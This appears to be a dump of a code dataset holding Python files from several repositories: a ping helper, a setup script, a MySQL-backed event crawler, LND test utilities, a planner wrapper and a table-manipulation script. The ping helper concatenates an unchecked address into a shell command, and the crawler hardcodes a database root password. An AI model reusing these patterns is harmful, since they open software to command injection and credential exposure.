blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
858ab50888dd21c994d1bce41e4e88333eaaa575
|
8d17a510ab17dec28ac05d26d3a0aeccceb9671a
|
/service/ping.py
|
163b376438712e900a8f99aaa7be6bada2e6d0db
|
[] |
no_license
|
duysy/DSMonitoring
|
6b7e2bc946f939dd0a1b911d7381e89b6e75d14e
|
c573e689aa7148cf397558d5cf6f4a0c1a4af9d2
|
refs/heads/main
| 2023-02-12T19:17:01.189478
| 2021-01-07T17:25:15
| 2021-01-07T17:25:15
| 323,513,216
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
import subprocess as sp
import sys
class Ping:
def ping(self,ipAddress):
if sys.platform.startswith('win'):
status,result = sp.getstatusoutput("ping " + ipAddress)
else:
status,result = sp.getstatusoutput("ping -c1 -w2 " + ipAddress)
if status == 0:
print("System " + ipAddress + " is UP !")
return True
else:
print("System " + ipAddress + " is DOWN !")
return False
# ping = Ping()
# ping.ping("127.0.0.1")
|
[
"duyduysysy@gmail.com"
] |
duyduysysy@gmail.com
|
d56303d442871076d3f279dc65ed8e5a21186c37
|
7541f7bf16b86dd00f43cf6c6a3ae4dfeb1ded07
|
/python/py3study/capi/setup.py
|
3c6c1c509434d6b19e50a7048b94f0d9c96adde3
|
[
"MIT"
] |
permissive
|
sillyemperor/langstudy
|
382fd026b19676426b3023b49e5a485d5bc12b56
|
937a11d97984e10e4ead54f3b7b7d6a1f2ef24a1
|
refs/heads/master
| 2021-06-18T21:39:48.682000
| 2019-10-30T11:19:45
| 2019-10-30T11:19:45
| 206,315,555
| 0
| 0
|
MIT
| 2021-04-26T19:29:50
| 2019-09-04T12:36:55
|
Python
|
UTF-8
|
Python
| false
| false
| 252
|
py
|
from distutils.core import setup, Extension
module1 = Extension('spam',
sources = ['spammodule.c'])
setup (name = 'spammodule',
version = '1.0',
description = 'This is a demo package',
ext_modules = [module1])
|
[
"sillyemperor@163.com"
] |
sillyemperor@163.com
|
bc52f1dbe657d63215c89f363cbe51dc31a0f7fb
|
9bab49ef2da0cf65ceb0ff00472f803f1ecfb99f
|
/refine/convention/refine_gumico.py
|
63e86277aa6508f2427f378169e75266c00687a3
|
[] |
no_license
|
abyssdog/crawling
|
52fcd9c6f7306c5eb6706ffd93864af93727b0a0
|
b8d406d3a8dc2d724cd521266567684a7cf000f2
|
refs/heads/master
| 2022-12-01T21:39:59.355055
| 2020-08-03T01:13:20
| 2020-08-03T01:13:20
| 262,006,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,773
|
py
|
import datetime
from datetime import timedelta
import pymysql
import re
from openpyxl import Workbook
from openpyxl import load_workbook
class CrawlClass(object):
def __init__(self):
self.host = 'localhost'
def test_insert1(self):
conn = pymysql.connect(
host=self.host,
port=3306,
user='root',
password='dangam1234',
db='convention',
charset='utf8'
)
curs = conn.cursor()
sql = """
SELECT *
FROM RAW_SCHEDULE
WHERE CONVENTION_NAME = 'gumico'
"""
curs.execute(sql)
rows = curs.fetchall()
cnt = 0
for row in rows:
cnt += 1
title_gumico = r'\<p class\=\"title\"\>(.*?)\<\!'
title_pattern = r"(캣|도그|펫|동물|애견|애완)" # row[3] => 페이지소스
match = re.findall(title_gumico, row[3]) # 제목을 먼저 찾아낸다
match2 = re.search(title_pattern, match[0]) # 찾아낸 제목에서 키워드로 필터링
pattern_host = r'\<em\>주 최\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_manage = r'\<em\>주 관\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_date = r'\<em\>기 간\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_time = r'\<em\>시 간\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_place = r'\<em\>장 소\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_money = r'\<li\>\<img alt\=\"입장료\" src\=\"\/kor\/images\/program\/item\_sch\_04.gif\"\/\> \<span\>(.*)\<\/span\>'
pattern_phone = r'\<em\>문 의\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>' #
pattern_url = row[4] # 해당 페이지 주소
pattern_home = r'<a href="([a-z]*.*)" tar' #
now = datetime.datetime.now()
reg_date = now.strftime('%Y-%m-%d %H:%M:%S')
z_start = ''
z_end = ''
if match2:
print(match[0]) # title
place = re.findall(pattern_place, row[3])
if len(place) != 0:
str_place = place[0]
else:
str_place = ''
date = re.findall(pattern_date, row[3])
tempdate = str(date).replace("['", "").replace("']", "").strip()
date_index = tempdate.find('~')
date_start = tempdate[0:date_index].replace('.', '-')
date_end = tempdate[date_index+1:len(tempdate)].replace('.', '-')
time = re.findall(pattern_time, row[3])
temptime = str(time).replace("['", "").replace("']", "").strip()
time_index = temptime.find('~')
time_start = temptime[0:time_index]
time_end = temptime[time_index+1:len(temptime)]
phone = re.findall(pattern_phone, row[3])
if len(phone) != 0:
str_phone = phone[0].strip()
else:
str_phone = ''
home = re.findall(pattern_home, row[3])
if len(home) > 0:
str_home = home[0].strip()
else:
str_home = ''
manage = re.findall(pattern_manage, row[3])
if len(manage) != 0:
str_manage = manage[0].strip()
else:
str_manage = ''
host = re.findall(pattern_host, row[3])
money = re.findall(pattern_money, row[3])
if len(money) != 0:
str_money = money[0]
else:
str_money = ''
print("주최 {}".format(host[0]))
print("주관 {}".format(str_manage))
print(date)
print(datetime.datetime.strptime(date_start.strip(), '%Y-%m-%d'))
d_start = datetime.datetime.strptime(date_start.strip(), '%Y-%m-%d')
print(datetime.datetime.strptime(date_end.strip(), '%Y-%m-%d'))
d_end = datetime.datetime.strptime(date_end.strip(), '%Y-%m-%d')
print('{start} ~ {end}'.format(start=time_start, end=time_end))
print("장소 {}".format(str_place))
print("돈 {}".format(str_money))
print("폰번호 {}".format(str_phone))
print("홈페이지 {}".format(str_home))
query = """insert into refine_schedule
(convention_name, event_name, full_address,
place_dept1, place_dept2, place_dept3, date_start, date_end,
time_start, time_end, phone_number, home_page, manage, host,
money, event_desc, source_url, source_name, reg_date)
values(%s, %s, %s, %s, %s, %s, %s, %s
, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
"""
executed = curs.execute(query,
('gumico', match[0],
'gumico 경상북도 구미시 산동면 첨단기업1로 49 {place}'.format(place=str_place),
'구미시', '산동면', '첨단기업1로 49',
d_start, d_end, time_start, time_end,
str_phone,
str_home, '', host[0], str_money, '',
pattern_url, 'gumico', reg_date))
conn.commit()
conn.close()
if __name__ == '__main__':
crawl = CrawlClass()
crawl.test_insert1()
|
[
"abyssdog@dangamsoft.com"
] |
abyssdog@dangamsoft.com
|
1c8644801d4f3284a3ca00d2e2b3c0baf999df32
|
19679e7853a3c5a7fe2fbfd898b4c94bfdd06678
|
/TContacts/main.py
|
72ac87d18ef8f5f447d60c93b9d396283ee8a8b2
|
[] |
no_license
|
danielteberian/TContacts
|
a8a524990874dbf9cbcd3dc85e92988ae1861772
|
d0034cc1ef6601b48ed24787fc119062514ba718
|
refs/heads/main
| 2023-04-14T19:45:19.672599
| 2021-05-04T00:55:45
| 2021-05-04T00:55:45
| 363,562,379
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
import sys
from PyQt5.QtWidgets import QApplication
from .database import createConnection
from .views import Window
def main():
app = QApplication(sys.argv)
if not createConnection("contacts.sqlite"):
sys.exit(1)
win = Window()
win.show()
sys.exit(app.exec())
|
[
"danielteberian@gmail.com"
] |
danielteberian@gmail.com
|
b209e7c64878457a0369057c5792e83d8cef26bc
|
76887783e57477f991f9d37b2f411064a2a798d2
|
/bin/backgroundSubtraction.py
|
c37bf3879e00e5ea0973a83220b8356193706b24
|
[] |
no_license
|
dougnd/vehicleTrackingPalmetto
|
6bd9f9166a86b693998d4a05a38c9c8b738a3d37
|
d22fd747041cfb8d86a8c984195dd083093e693d
|
refs/heads/master
| 2021-01-13T08:49:36.797896
| 2016-12-15T22:11:20
| 2016-12-15T22:11:20
| 71,915,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,428
|
py
|
import vtpalmetto
from sh import rm, Command, cp
import re
import argparse
import time
import numpy as np
runHours = 10
vtp = vtpalmetto.VTPalmetto()
vtp.qsubParams = dict(l='select=1:ncpus=6:mem=16gb,walltime={0}:00:00'.format(
runHours))
vtp.name = 'backgroundSubtraction'
testFrames = [10, 11, 12, 13, 14]
trainFrames = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
x=0
y=0
w=5300
h=3500
sz=300
n=20
def task(dataset, _job):
startTime = time.time()
vtp.setJob(_job)
vtp.gotoTmp()
rm('-rf', 'vehicleTracking')
vtp.getVT()
vtp.cmakeVT()
vtp.makeVT('basicDetector')
basicDetector = Command("util/basicDetector")
vtp.makeVT('detectionAccuracy')
detectionAccuracy = Command("util/detectionAccuracy")
cp('-r', vtp.srcDir+'/data/labels/skycomp1', '.')
results = dict()
for threshold in np.square(np.arange(1.0, 15.0, 0.1)):
basicDetector('-r', x, y, w, h, '-s', sz, '-n', n, '-g', vtp.gpuDev, '-t', threshold, "-d", "background", dataset)
out = vtp.detectionAccuracy(l=dataset, d='detections.pb',
t=' '.join(str(t) for t in trainFrames),
T=' '.join(str(t) for t in testFrames))
results[threshold] = out
return results
parser = argparse.ArgumentParser()
parser.add_argument('command', choices=['submit', 'status', 'results'])
class optionalFile(argparse.FileType):
def __call__(self, string):
if string == None:
return None
return super(optionalFile,self).__call__(string)
parser.add_argument('-f', '--filename', default=None, type=optionalFile('w'))
args = parser.parse_args()
if args.command == 'submit':
vtpalmetto.submit(vtp,task,[dict(dataset='skycomp1')])
elif args.command == 'status':
vtpalmetto.printStatus(vtp)
elif args.command == 'results':
jobs =vtp.getJobs()
from tabulate import tabulate
for j in jobs:
ret=j.decode(j.retVal)
params=j.decode(j.params)
print 'params: {0}'.format(params)
ret = sorted((dict(threshold=k, **v) for k,v in ret.iteritems()), key=lambda x:x['threshold'])
print tabulate(ret, headers='keys')
if args.filename != None:
import json
print "writing out results to file"
args.filename.write(json.dumps(ret))
#d = {}
#for k in ret[0].keys():
#d[k] = [int(ret[i][k]) for i in sorted(ret.keys())]
#print d
|
[
"dougnd@gmail.com"
] |
dougnd@gmail.com
|
50102739f72f9582a523ede93ba809e7e04c7c54
|
5acbe301bec58ca72b9952f58e7c859832eaf021
|
/1_ProceduralProg/Chap02/Exo02/count_chars.py
|
cff565d74fafcaf21c38e1df87f3ae997cb6c5c0
|
[] |
no_license
|
sovoessi/PYTHON
|
558f90f045603b92a154dc37dcdffc287e0dcb06
|
aeda903fb08dce485f8d2c9c089a48c66d79f623
|
refs/heads/master
| 2023-04-10T18:12:22.614658
| 2021-04-21T10:08:52
| 2021-04-21T10:08:52
| 360,092,685
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
in_user = input("What is the input string? ")
print(f"{in_user} has {len(in_user)} characters.")
|
[
"jacksovoessi@hotmail.com"
] |
jacksovoessi@hotmail.com
|
aabadc504dfeff265515c90881f8e004e9daa705
|
c6fe47c1d631a29e86c5a9f8c2a2cba8b3b1b520
|
/tests/test_utils/lnd.py
|
573a36ee7c912c97715ae37bb2b2adeb03fa2bb5
|
[
"MIT"
] |
permissive
|
merta1/lnd_grpc
|
ad2d9f731ee84f34ea6e9fab807c9d98990d752d
|
09091b8a7d25f47abd32ea25896fc47cdb95d105
|
refs/heads/master
| 2020-05-20T05:35:02.008216
| 2019-04-29T08:33:15
| 2019-04-29T08:33:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,786
|
py
|
import logging
import os
import time
from ephemeral_port_reserve import reserve
from lnd_grpc.lnd_grpc import Client as lndClient
from test_utils.utils import TailableProc, BITCOIND_CONFIG
# Needed for grpc to negotiate a valid cipher suite
os.environ["GRPC_SSL_CIPHER_SUITES"] = 'HIGH+ECDSA'
class LndD(TailableProc):
CONF_NAME = 'lnd.conf'
def __init__(self, lightning_dir, bitcoind, port, node_id):
super().__init__(lightning_dir, 'lnd({})'.format(node_id))
self.lightning_dir = lightning_dir
self.bitcoind = bitcoind
self.port = port
self.rpc_port = str(reserve())
self.rest_port = str(reserve())
self.prefix = f'lnd-{node_id}'
try:
if os.environ['TRAVIS_BUILD_DIR']:
self.tlscertpath = os.environ[
'TRAVIS_BUILD_DIR'] + '/tests/test_utils/test-tls.cert'
except KeyError:
self.tlscertpath = 'test_utils/test-tls.cert'
try:
if os.environ['TRAVIS_BUILD_DIR']:
self.tlskeypath = os.environ['TRAVIS_BUILD_DIR'] + '/tests/test_utils/test-tls.key'
except KeyError:
self.tlskeypath = 'test_utils/test-tls.key'
self.cmd_line = [
'lnd',
'--bitcoin.active',
'--bitcoin.regtest',
'--datadir={}'.format(lightning_dir),
'--debuglevel=trace',
'--rpclisten=127.0.0.1:{}'.format(self.rpc_port),
'--restlisten=127.0.0.1:{}'.format(self.rest_port),
'--listen=127.0.0.1:{}'.format(self.port),
'--tlscertpath={}'.format(self.tlscertpath),
'--tlskeypath={}'.format(self.tlskeypath),
'--bitcoin.node=bitcoind',
'--bitcoind.rpchost=127.0.0.1:{}'.format(BITCOIND_CONFIG.get('rpcport', 18332)),
'--bitcoind.rpcuser=rpcuser',
'--bitcoind.rpcpass=rpcpass',
'--bitcoind.zmqpubrawblock=tcp://127.0.0.1:{}'.format(self.bitcoind.zmqpubrawblock_port),
'--bitcoind.zmqpubrawtx=tcp://127.0.0.1:{}'.format(self.bitcoind.zmqpubrawtx_port),
'--configfile={}'.format(os.path.join(lightning_dir, self.CONF_NAME)),
'--nobootstrap',
'--noseedbackup',
'--trickledelay=500'
]
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
with open(os.path.join(lightning_dir, self.CONF_NAME), "w") as f:
f.write("""[Application Options]\n""")
def start(self):
super().start()
self.wait_for_log('RPC server listening on')
self.wait_for_log('Done catching up block hashes')
time.sleep(3)
logging.info('LND started (pid: {})'.format(self.proc.pid))
def stop(self):
self.proc.terminate()
time.sleep(3)
if self.proc.poll() is None:
self.proc.kill()
self.proc.wait()
super().save_log()
class LndNode(lndClient):
displayname = 'lnd'
def __init__(self, lightning_dir, lightning_port, bitcoind, executor=None, node_id=0):
self.bitcoin = bitcoind
self.executor = executor
self.daemon = LndD(lightning_dir, bitcoind, port=lightning_port, node_id=node_id)
self.node_id = node_id
self.logger = logging.getLogger(name='lnd-node({})'.format(self.node_id))
self.myid = None
self.invoice_rpc_active = False
super().__init__(lnd_dir=lightning_dir,
grpc_host='localhost',
grpc_port=str(self.daemon.rpc_port),
network='regtest',
tls_cert_path=self.daemon.tlscertpath,
macaroon_path=lightning_dir + 'chain/bitcoin/regtest/admin.macaroon')
def id(self):
if not self.myid:
self.myid = self.get_info().identity_pubkey
return self.myid
def restart(self):
self.daemon.stop()
time.sleep(5)
self.daemon.start()
def stop(self):
self.daemon.stop()
def start(self):
self.daemon.start()
self.daemon.wait_for_log('Starting sub RPC server: InvoicesRPC', timeout=10)
self.invoice_rpc_active = True
def add_funds(self, bitcoind, amount):
start_amt = self.wallet_balance().total_balance
addr = self.new_address('p2wkh').address
bitcoind.rpc.sendtoaddress(addr, amount)
self.daemon.wait_for_log("Inserting unconfirmed transaction")
bitcoind.rpc.generate(3)
self.daemon.wait_for_log("Marking unconfirmed transaction")
# The above still doesn't mean the wallet balance is updated,
# so let it settle a bit
i = 0
while self.wallet_balance().total_balance != (start_amt + (amount * 10 ** 8)) and i < 30:
time.sleep(0.25)
i += 1
assert (self.wallet_balance().total_balance == start_amt + (amount * 10 ** 8))
def check_channel(self, remote):
""" Make sure that we have an active channel with remote
"""
self_id = self.id()
remote_id = remote.id()
channels = self.list_channels()
channel_by_remote = {c.remote_pubkey: c for c in channels}
if remote_id not in channel_by_remote:
self.logger.warning("Channel {} -> {} not found".format(self_id, remote_id))
return False
channel = channel_by_remote[remote_id]
self.logger.debug("Channel {} -> {} state: {}".format(self_id, remote_id, channel))
return channel.active
def block_sync(self, blockhash):
print("Waiting for node to learn about", blockhash)
self.daemon.wait_for_log('NTFN: New block: height=([0-9]+), sha={}'.format(blockhash))
|
[
"noreply@github.com"
] |
merta1.noreply@github.com
|
83ff841244fcd72238e5a536dca7417a458e86f2
|
73a803650cbd64615091e57d13101e9420e25b22
|
/tweetapp/migrations/0006_auto_20200907_2123.py
|
52ec2822282b7dbd1b95871d1f59d39ea77b9ebb
|
[] |
no_license
|
Joseph455/tweet-clone
|
e332cb393983767142858205dfa508f580b2491e
|
0fcfc62263ca6a9f9bd933d016df2df9dca4e6be
|
refs/heads/master
| 2023-07-10T16:02:47.482217
| 2021-08-21T18:27:42
| 2021-08-21T18:27:42
| 330,186,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 508
|
py
|
# Generated by Django 3.0.8 on 2020-09-07 21:23
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('tweetapp', '0005_auto_20200907_2120'),
]
operations = [
migrations.AlterField(
model_name='message',
name='date_created',
field=models.DateTimeField(default=datetime.datetime(2020, 9, 7, 21, 23, 27, 443239, tzinfo=utc)),
),
]
|
[
"adebowalejojo2001@gmail.com"
] |
adebowalejojo2001@gmail.com
|
09903d4b9833932dbf2e2f99e2d1f45a1660182f
|
3a8408aefe35580e4c1f6a4ac3d22c8bf41827af
|
/demo/goal_planner_gui/src/planning.py
|
5dda51c72081291d7976579c1779438ce26f14b2
|
[] |
no_license
|
Hankfirst/neurobots_demonstrator
|
df9cc2b44785da6866fb8161bd9ac4811f886009
|
b77fadce8054163899ff7ca65d2d4417441649f0
|
refs/heads/master
| 2021-09-24T22:04:15.493990
| 2018-10-15T13:27:20
| 2018-10-15T13:27:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,256
|
py
|
from os.path import abspath, dirname
from configobj import ConfigObj
from pddllib import pddl
import cplan
import goals
import logging
logger = logging.getLogger('root')
#planner config
CONFIG_FN = "config.ini"
class Planner(object):
def __init__(self, state, config_path):
config = ConfigObj(config_path+CONFIG_FN, file_error=True, list_values=False, interpolation="ConfigParser")
config['src_path'] = abspath(dirname(__file__))
config = cplan.utils.config_to_struct(config)
self.planner = getattr(cplan.planner, config.base_planner.planner)(config)
self.state = state
self.problem = state.problem
self.plan = None
def set_state(self, state):
self.state = state
self.problem = state.problem
def execute_action(self, action, args):
logger.debug("execute action (%s %s)" % (action.name, " ".join(map(str, args))))
new_state = None
with action.instantiate(dict(zip(action.args, args)), self.problem):
if not self.state.is_executable(action):
return False
new_state = self.state.copy()
new_state.apply_effect(action.effect)
init_facts = [f.to_init() for f in new_state.iterfacts()]
new_prob = pddl.Problem(self.problem.name, self.problem.objects, init_facts, self.problem.goal, self.problem.domain, self.problem.optimization, self.problem.opt_func)
self.problem = new_prob
self.state = new_state
return True
def find_plan(self, goal):
problem = self.problem.copy()
pddlgoal = goal.pddl_goal()
problem.goal = pddlgoal.copy(new_scope=problem)
logger.debug(problem.goal.pddl_str())
task = cplan.task.Task(problem, 0)
# task.deadline = 220
task.set_planner(self.planner)
task.problem_to_state()
task.replan()
logger.debug(task.plan)
self.plan = task.plan
def get_plan(self):
if self.plan is None:
return []
sorted_plan = self.plan.topological_sort()
return [a for a in sorted_plan if a not in (self.plan.init_node, self.plan.goal_node)]
|
[
"kuhnerd@informatik.uni-freiburg.de"
] |
kuhnerd@informatik.uni-freiburg.de
|
441a9766f2e2c2e0dc1072e93602ca8d44b81b43
|
b1fb6abd2ec53d180e45c02bcec2e5c8b8ab5729
|
/src/scriptManipulateTable.py
|
b740b2073be62ad2be5c27fbdfaff25eba0f264f
|
[] |
no_license
|
biobakery/pouchitis
|
1162075fb9b889b788fbaf2147399235d3fb73fb
|
b19d3a18159a5ef1c5ed8580f7b66956b01eabd1
|
refs/heads/master
| 2022-07-05T20:58:02.113791
| 2020-05-21T00:09:44
| 2020-05-21T00:09:44
| 265,713,286
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,676
|
py
|
#!/usr/bin/env python
"""
Author: Timothy Tickle
Description: Performs common manipulations on tables
"""
__author__ = "Timothy Tickle"
__copyright__ = "Copyright 2012"
__credits__ = ["Timothy Tickle"]
__license__ = ""
__version__ = ""
__maintainer__ = "Timothy Tickle"
__email__ = "ttickle@sph.harvard.edu"
__status__ = "Development"
import argparse
import csv
import sys
import re
import os
import numpy as np
from AbundanceTable import AbundanceTable
from PCA import PCA
from ValidateData import ValidateData
#Set up arguments reader
argp = argparse.ArgumentParser( prog = "scriptManipulateTable.py",
description = """Performs common manipulations on tables.\nExample: python scriptManipulateTable.py -i TID -l STSite Test.pcl""" )
#Arguments
#Describe table
argp.add_argument("-i","--id", dest="sIDName", default="ID", help="Abundance Table ID")
argp.add_argument("-l","--meta", dest="sLastMetadataName", help="Last metadata name")
argp.add_argument("-d","--fileDelim", dest= "cFileDelimiter", action= "store", default="\t", help="File delimiter, default tab")
argp.add_argument("-f","--featureDelim", dest= "cFeatureDelimiter", action= "store", default="|", help="Feature (eg. bug or function) delimiter, default '|'")
#Checked x 2
argp.add_argument("-n","--doNorm", dest="fNormalize", action="store_true", default=False, help="Flag to turn on normalization")
argp.add_argument("-s","--doSum", dest="fSum", action="store_true", default=False, help="Flag to turn on summation")
#Unsupervised filtering
argp.add_argument("-A","--doFilterAbundance", dest="strFilterAbundance", action="store", default=None, help="Turns on filtering by abundance (remove features that do not have a minimum abundance in a minimum number of samples); Should be a real number and an integer in the form 'minAbundance,minSamples', (should be performed on a normalized file).")
argp.add_argument("-P","--doFilterPercentile", dest="strFilterPercentile", action="store", default=None, help="Turns on filtering by percentile Should be two numbers between 0 and 1 in the form 'percentile,percentage'. (should be performed on a normalized file).")
argp.add_argument("-O","--doFilterOccurrence", dest="strFilterOccurence", action="store", default=None, help="Turns on filtering by occurrence. Should be two integers in the form 'minSequence,minSample' (should NOT be performed on a normalized file).")
#argp.add_argument("-D","--doFilterDeviation", dest="dCuttOff", action="store", type=float, default=None, help="Flag to turn on filtering by standard deviation (should NOT be performed on a normalized file).")
#Change bug membership
argp.add_argument("-t","--makeTerminal", dest="fMakeTerminal", action="store_true", default=False, help="Works reduces the file to teminal features in the original file.")
argp.add_argument("-u","--reduceOTUs", dest="fRemoveOTUs", action="store_true", default=False, help="Remove otu entries from file.")
argp.add_argument("-c","--reduceToClade", dest="iClade", action="store", type=int, default=None, help="Specify a level of clade to reduce to [].")
argp.add_argument("-b","--reduceToFeatures", dest="strFeatures", action="store", default=None, help="Reduce measurements to certain features (bugs or functions). This can be a comma delimited string (of atleast 2 bugs) or a file.")
#Manipulate based on metadata
#Checked
argp.add_argument("-y","--stratifyBy", dest="strStratifyBy", action="store", default=None, help="Metadata to stratify tables by.")
argp.add_argument("-r","--removeMetadata", dest="strRemoveMetadata", action="store", default=None, help="Remove samples of this metadata and value (format comma delimited string with metadata id first and the values to remove after 'id,lvalue1,value2').")
#Manipulate lineage
#Checked
argp.add_argument("-x","--doPrefixClades", dest="fPrefixClades", action="store_true", default=False, help="Flag to turn on adding prefixes to clades to better identify them, for example s__ will be placed infront of each species.")
#Combine tables
#argp.add_argument("-m","--combineIntersect", dest="fCombineIntersect", action="store_true", default=False, help="Combine two tables including only common features/metadata (intersection).")
#argp.add_argument("-e","--combineUnion", dest="fCombineUnion", action="store_true", default=False, help="Combine two tables (union).")
#Dimensionality Reduction
argp.add_argument("-p","--doPCA", dest="fDoPCA",action="store_true", default=False, help="Flag to turn on adding metabugs and metametadata by performing PCA on each of bug relative abundance and continuous metadata and add the resulting components")
#Checked
argp.add_argument("-o","--output", dest="strOutFile", action="store", default=None, help="Indicate output pcl file.")
argp.add_argument("strFileAbund", help ="Input data file")
args = argp.parse_args( )
# Creat output file if needed.
if not args.strOutFile:
args.strOutFile = os.path.splitext(args.strFileAbund)[0]+"-mod.pcl"
lsPieces = os.path.splitext(args.strOutFile)
#List of abundance tables
lsTables = []
#Read in abundance table
abndTable = AbundanceTable.funcMakeFromFile(xInputFile=args.strFileAbund,
cDelimiter = args.cFileDelimiter,
sMetadataID = args.sIDName,
sLastMetadata = args.sLastMetadataName,
lOccurenceFilter = None,
cFeatureNameDelimiter=args.cFeatureDelimiter,
xOutputFile = args.strOutFile)
#TODO Check filtering, can not have some filtering together
# Make feature list
lsFeatures = []
if args.strFeatures:
print "Get features not completed"
# if "," in args.strFeatures:
# lsFeatures = args.strFeatures.split(",")
# print "ManipulateTable::Reading in feature list "+str(len(lsFeatures))+"."
# else:
# csvr = csv.reader(open(args.strFeatures, "rU"))
# print "ManipulateTable::Reading in feature file "+args.strFeatures+"."
# for lsLine in csvr:
# lsFeatures.extend(lsLine)
lsTables.append(abndTable)
# Do summing
#Sum if need
if args.fSum:
for abndTable in lsTables:
print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before summing."
fResult = abndTable.funcSumClades()
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" was summed."
print "ManipulateTable::"+abndTable.funcGetName()+" has "+str(len(abndTable.funcGetFeatureNames()))+" features after summing."
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT summed."
# Filter on counts
if args.strFilterOccurence:
iMinimumSequence,iMinimumSample = args.strFilterOccurence.split(",")
for abndTable in lsTables:
if abndTable.funcIsNormalized():
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" is normalized and can not be filtered by occurence. This filter needs counts."
else:
fResult = abndTable.funcFilterAbundanceBySequenceOccurence(iMinSequence = int(iMinimumSequence), iMinSamples = int(iMinimumSample))
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" was filtered by occurence and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT filtered by occurence."
# Change bug membership
if args.fMakeTerminal:
lsTerminalTables = []
for abndTable in lsTables:
print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before making terminal."
abndTable = abndTable.funcGetFeatureAbundanceTable(abndTable.funcGetTerminalNodes())
if abndTable:
print "ManipulateTable::"+abndTable.funcGetName()+" has "+str(len(abndTable.funcGetFeatureNames()))+" terminal features."
lsTerminalTables.append(abndTable)
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was not made terminal."
lsTables = lsTerminalTables
if args.fRemoveOTUs:
lsNotOTUs = []
for abndTable in lsTables:
print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before removing OTUs."
abndTable = abndTable.funcGetWithoutOTUs()
if abndTable:
print "ManipulateTable::"+abndTable.funcGetName()+" had OTUs removed and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
lsNotOTUs.append(abndTable)
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" OTUs were not removed."
lsTables = lsNotOTUs
if args.iClade:
for abndTable in lsTables:
fResult = abndTable.funcReduceFeaturesToCladeLevel(args.iClade)
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" was reduced to clade level "+str(args.iClade)+"."
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT reduced in clade levels."
if args.strFeatures:
for abndTable in lsTables:
fResult = abndTable.funcGetFeatureAbundanceTable(lsFeatures)
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced to given features and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced to the given list."
if args.strRemoveMetadata:
lsMetadata = args.strRemoveMetadata.split(",")
for abndTable in lsTables:
fResult = abndTable.funcRemoveSamplesByMetadata(sMetadata=lsMetadata[0], lValuesToRemove=lsMetadata[1:])
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" has had samples removed and now has "+str(len(abndTable.funcGetSampleNames()))+" samples."
else:
print "ManipulateTable::ERROR. Could not remove samples from "+abndTable.funcGetName()+"."
# Normalize if needed
if args.fNormalize:
for abndTable in lsTables:
fResult = abndTable.funcNormalize()
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" was normalized."
else:
print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized."
# Filter on percentile
if args.strFilterPercentile:
dPercentile,dPercentage = args.strFilterPercentile.split(",")
for abndTable in lsTables:
if abndTable.funcIsNormalized():
fResult = abndTable.funcFilterAbundanceByPercentile(dPercentileCutOff = float(dPercentile), dPercentageAbovePercentile = float(dPercentage))
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by percentile and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
else:
